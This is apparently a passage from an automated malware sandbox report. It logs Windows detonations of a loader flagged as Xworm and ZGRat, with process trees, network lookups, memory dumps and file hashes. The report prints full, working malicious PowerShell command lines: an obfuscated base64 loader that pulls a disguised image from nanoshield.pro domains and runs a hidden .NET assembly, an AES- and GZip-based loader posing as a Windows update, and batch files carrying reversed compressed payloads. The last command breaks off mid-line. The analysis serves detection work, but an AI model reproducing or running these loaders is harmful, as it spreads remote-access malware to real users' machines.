'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreB3DgTreGUDgTreYgBDDgTreGwDgTreaQBlDgTreG4DgTredDgTreDgTregDgTreD0DgTreIDgTreBODgTreGUDgTredwDgTretDgTreE8DgTreYgBqDgTreGUDgTreYwB0DgTreCDgTreDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBODgTreGUDgTredDgTreDgTreuDgTreFcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreDsDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTrePQDgTregDgTreEcDgTreZQB0DgTreC0DgTreUgBhDgTreG4DgTreZDgTreBvDgTreG0DgTreIDgTreDgTretDgTreEkDgTrebgBwDgTreHUDgTredDgTreBPDgTreGIDgTreagBlDgTreGMDgTredDgTreDgTregDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTreLQBDDgTreG8DgTredQBuDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreDgTre0DgTreCgDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreByDgTreGUDgTredDgTreB1DgTreHIDgTrebgDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTregDgTreH0DgTreOwDgTregDgTreDgTre0DgTreCgDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTrebgBhDgTreG4DgTrebwBzDgTreGgDgTreaQBlDgTreGwDgTreZDgTreDgTreuDgTreHDgTreDgTrecgBvDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreMgDgTreuDgTreGoDgTrecDgTreBnDgTreD8DgTreMQDgTre2DgTreDYDgTreMQDgTre1DgTreDQDgTreNwDgTreyDgTreDUDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTrebgBhDgTreG4DgTrebwBzDgTreGgDgTreZDgTreDgTreuDgTreHDgTreDgTrecgBvDgTreC8DgTreZgBpDgTreGwDgTreZQBzDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNDgTreDgTre0DgTreDQDgTreMQDgTre3DgTreDIDgTreMwDgTrenDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreDgTre0DgTreCgDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTreLQBuDgTreGUDgTreIDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBUDgTreGUDgTreeDgTreB0DgTreC4DgTreRQBuDgTreGMDgTrebwBkDgTreGkDgTrebgBnDgTreF0DgTreOgDgTre6DgTreFUDgTreVDgTreBGDgTreDgDgTreLgBHDgTreGUDgTredDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreDQDgTreKDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreFMDgTreVDgTreBBDgTreFIDgTreVDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreRQBODgTreEQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCDgTreDgTreDQDgTreKDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwBlDgTreCDgTreDgTreMDgTreDgTregDgTreC0DgTreYQBuDgTreGQDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwB0DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreKwDgTre9DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBDDgTreG8DgTrebgB2DgTreGUDgTrecgB0DgTreF0DgTreOgDgTre6DgTreEYDgTrecgBvDgTreG0DgTreQgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFIDgTreZQBmDgTreGwDgTreZQBjDgTreHQDgTreaQBvDgTreG4DgTreLgBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreXQDgTre6DgTreDoDgTreTDgTreBvDgTreGEDgTreZDgTreDgTreoDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreCDgTreDgTrePQDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreC4DgTreRwBlDgTreHQDgTreVDgTreB5DgTreHDgTreDgTreZQDgTreoDgTreCcDgTredDgTreBlDgTreHMDgTredDgTreBwDgTreG8DgTredwBlDgTreHIDgTrecwBoDgTreGUDgTrebDgTreBsDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBtDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreLgBHDgTreGUDgTredDgTreBNDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTreoDgTreCcDgTrebDgTreBhDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTrebwBkDgTreGUDgTrebgBjDgTreGsDgTrebwDgTrevDgTreHMDgTreZQBsDgTreGkDgTreZgDgTrevDgTreG8DgTrecgBwDgTreC4DgTreZDgTreBsDgTreGUDgTreaQBoDgTreHMDgTrebwBuDgTreGEDgTrebgDgTrevDgTreC8DgTreOgBzDgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTresDgTreCDgTreDgTreJwDgTrexDgTreCcDgTreLDgTreDgTregDgTreCcDgTreQQBkDgTreG8DgTreYgBlDgTreCcDgTreKQDgTrepDgTreH0DgTrefQDgTre=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://nanoshield.pro/new_image2.jpg?166154725', 'https://nanoshd.pro/files/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.odencko/selif/orp.dleihsonan//:sptth', '1', 'Adobe'))}}"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | nanoshd.pro | udp |
| US | 8.8.8.8:53 | nanoshield.pro | udp |
| US | 104.21.37.30:443 | nanoshield.pro | tcp |
Files
memory/2668-4-0x000000001B220000-0x000000001B502000-memory.dmp
memory/2668-5-0x000007FEF5940000-0x000007FEF62DD000-memory.dmp
memory/2668-7-0x0000000002820000-0x0000000002828000-memory.dmp
memory/2668-6-0x0000000002740000-0x00000000027C0000-memory.dmp
memory/2668-8-0x000007FEF5940000-0x000007FEF62DD000-memory.dmp
memory/2668-9-0x0000000002740000-0x00000000027C0000-memory.dmp
memory/2668-10-0x0000000002740000-0x00000000027C0000-memory.dmp
memory/2668-11-0x0000000002740000-0x00000000027C0000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HY769T7AS1F5GZIR22I0.temp
| MD5 | 3f25930d6bd489dfb884d6770376f149 |
| SHA1 | 5eec9cbc758bd23d2e1501ebd5d5eccec3bc4842 |
| SHA256 | 04076109e1d8a772d3053f65967be14d1a05e8e553ac2ed36f6ed920502c4f69 |
| SHA512 | 5bd726831e16be240af9e11af24a89bdb26ac32805fbd690df4b91bf8951d4af16677913c6f867e7dfac4ecabe6d8b047a5d5245ff086bc11e5ebc8fde06512a |
memory/2460-17-0x000007FEF5940000-0x000007FEF62DD000-memory.dmp
memory/2460-18-0x0000000002610000-0x0000000002690000-memory.dmp
memory/2460-19-0x000007FEF5940000-0x000007FEF62DD000-memory.dmp
memory/2460-20-0x0000000002610000-0x0000000002690000-memory.dmp
memory/2460-22-0x0000000002610000-0x0000000002690000-memory.dmp
memory/2460-21-0x0000000002610000-0x0000000002690000-memory.dmp
memory/2460-23-0x000000001AA90000-0x000000001AADE000-memory.dmp
memory/2460-24-0x000007FEF5940000-0x000007FEF62DD000-memory.dmp
memory/2668-25-0x000007FEF5940000-0x000007FEF62DD000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-04-19 07:49
Reported
2024-04-19 07:52
Platform
win7-20231129-en
Max time kernel
118s
Max time network
119s
Command Line
Signatures
Suspicious behavior: CmdExeWriteProcessMemorySpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\windows_update\loader.cmd"
C:\Windows\system32\cmd.exe
cmd /c \"set __=^&rem\
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\windows_update\loader.cmd
C:\Windows\system32\cmd.exe
cmd /c \"set __=^&rem\
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\windows_update\loader.cmd';$yqWK='LiJdgoadiJdg'.Replace('iJdg', ''),'ChBhSSaBhSSngBhSSeExBhSStBhSSenBhSSsBhSSioBhSSnBhSS'.Replace('BhSS', ''),'CopkoQeyTkoQeokoQe'.Replace('koQe', ''),'DerzLocrzLoomprzLoresrzLosrzLo'.Replace('rzLo', ''),'GQRxjetCQRxjurQRxjrenQRxjtPQRxjrQRxjocQRxjeQRxjssQRxj'.Replace('QRxj', ''),'FrBKzDomBBKzDaBKzDseBKzD6BKzD4SBKzDtrBKzDinBKzDgBKzD'.Replace('BKzD', ''),'SzuQcplzuQcitzuQc'.Replace('zuQc', ''),'ECcAUnCcAUtrCcAUyPCcAUoCcAUinCcAUtCcAU'.Replace('CcAU', ''),'RhWnpeahWnpdhWnpLihWnpnhWnpehWnpshWnp'.Replace('hWnp', ''),'ElTwQcemeTwQcntTwQcAtTwQc'.Replace('TwQc', ''),'CrerpgJatrpgJeDerpgJcrrpgJyrpgJptrpgJorrpgJ'.Replace('rpgJ', ''),'TraUhnCnsfUhnCoUhnCrmFUhnCinUhnCalUhnCBloUhnCckUhnC'.Replace('UhnC', ''),'MkqpgaikqpgnMkqpgokqpgdulkqpgekqpg'.Replace('kqpg', ''),'InNqdDvNqdDokeNqdD'.Replace('NqdD', '');powershell -w hidden;function iZOzL($TzqHY){$CRDEw=[System.Security.Cryptography.Aes]::Create();$CRDEw.Mode=[System.Security.Cryptography.CipherMode]::CBC;$CRDEw.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$CRDEw.Key=[System.Convert]::($yqWK[5])('Y7IdTi6kX5lJbhqYY9FqtDytubVi34n2yBW8Q4423Ak=');$CRDEw.IV=[System.Convert]::($yqWK[5])('tLQNTWTubc+g+4ALClBhsw==');$AoFaY=$CRDEw.($yqWK[10])();$bufIb=$AoFaY.($yqWK[11])($TzqHY,0,$TzqHY.Length);$AoFaY.Dispose();$CRDEw.Dispose();$bufIb;}function xWxTo($TzqHY){$cdgLK=New-Object System.IO.MemoryStream(,$TzqHY);$cQORb=New-Object System.IO.MemoryStream;$eSUCm=New-Object System.IO.Compression.GZipStream($cdgLK,[IO.Compression.CompressionMode]::($yqWK[3]));$eSUCm.($yqWK[2])($cQORb);$eSUCm.Dispose();$cdgLK.Dispose();$cQORb.Dispose();$cQORb.ToArray();}$nXsEX=[System.IO.File]::($yqWK[8])([Console]::Title);$MCbHr=xWxTo (iZOzL ([Convert]::($yqWK[5])([System.Linq.Enumerable]::($yqWK[9])($nXsEX, 5).Substring(2))));$nFODc=xWxTo (iZOzL ([Convert]::($yqWK[5])([System.Linq.Enumerable]::($yqWK[9])($nXsEX, 6).Substring(2))));[System.Reflection.Assembly]::($yqWK[0])([byte[]]$nFODc).($yqWK[7]).($yqWK[13])($null,$null);[System.Reflection.Assembly]::($yqWK[0])([byte[]]$MCbHr).($yqWK[7]).($yqWK[13])($null,$null); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Network
Files
memory/3044-2-0x0000000073AC0000-0x000000007406B000-memory.dmp
memory/3044-3-0x0000000073AC0000-0x000000007406B000-memory.dmp
memory/3044-4-0x00000000028A0000-0x00000000028E0000-memory.dmp
memory/3044-5-0x00000000028A0000-0x00000000028E0000-memory.dmp
memory/3044-6-0x0000000073AC0000-0x000000007406B000-memory.dmp
memory/3044-7-0x00000000028A0000-0x00000000028E0000-memory.dmp
Analysis: behavioral10
Detonation Overview
Submitted
2024-04-19 07:49
Reported
2024-04-19 07:52
Platform
win10v2004-20240412-en
Max time kernel
57s
Max time network
173s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 1252 created 3472 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Explorer.EXE |
Xworm
ZGRat
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\notepad.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\notepad.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\notepad.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\windows_update\loader.ps1
C:\Windows\System32\notepad.exe
C:\Windows\System32\notepad.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vxboda.bat" "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -command "$Wogaptd = Get-Content 'C:\Users\Admin\AppData\Local\Temp\vxboda.bat' | select-object -Last 1; $Bbvjyjl = [System.Convert]::FromBase64String($Wogaptd);$Osqqdzvqkq = New-Object System.IO.MemoryStream( , $Bbvjyjl );$Ooivncxsvx = New-Object System.IO.MemoryStream;$Ouqoommak = New-Object System.IO.Compression.GzipStream $Osqqdzvqkq, ([IO.Compression.CompressionMode]::Decompress);$Ouqoommak.CopyTo( $Ooivncxsvx );$Ouqoommak.Close();$Osqqdzvqkq.Close();[byte[]] $Bbvjyjl = $Ooivncxsvx.ToArray();[Array]::Reverse($Bbvjyjl); $Bjklpyasha = [System.Threading.Thread]::GetDomain().Load($Bbvjyjl); $Pldyxr = $Bjklpyasha.EntryPoint.DeclaringType.GetMethods()[0].Invoke($null, $null) | Out-Null"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jznltd.bat" "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -command "$Flmceaelwj = Get-Content 'C:\Users\Admin\AppData\Local\Temp\jznltd.bat' | select-object -Last 1; $Qpiedhffan = [System.Convert]::FromBase64String($Flmceaelwj);$Tlfdzhtvv = New-Object System.IO.MemoryStream( , $Qpiedhffan );$Oosvmvwadrd = New-Object System.IO.MemoryStream;$Ipxfr = New-Object System.IO.Compression.GzipStream $Tlfdzhtvv, ([IO.Compression.CompressionMode]::Decompress);$Ipxfr.CopyTo( $Oosvmvwadrd );$Ipxfr.Close();$Tlfdzhtvv.Close();[byte[]] $Qpiedhffan = $Oosvmvwadrd.ToArray();[Array]::Reverse($Qpiedhffan); $Uyqgmoqrr = [System.Threading.Thread]::GetDomain().Load($Qpiedhffan); $Premz = 